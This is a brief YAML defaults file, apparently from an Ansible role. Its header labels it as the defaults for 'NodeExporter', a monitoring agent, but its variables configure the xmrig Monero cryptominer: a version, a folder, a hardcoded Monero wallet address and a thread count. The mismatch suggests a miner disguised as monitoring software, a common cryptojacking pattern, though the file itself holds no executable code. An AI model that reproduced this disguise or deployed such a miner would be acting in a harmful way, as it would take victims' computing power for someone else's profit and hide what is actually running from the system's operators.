---
# defaults file for NodeExporter
    xmrig_version: ""
    xmrig_folder: ""
    monero_valet: "47v1WB8yoXGAd6NEC19Yqj86QsMarLhLPZdLpiu31tbUgoRTzhvsHhZE48LgR3LYMC5iZ3ixTMXVpiGcsEJZdR5KNB1dNDT"
    threads: "3"
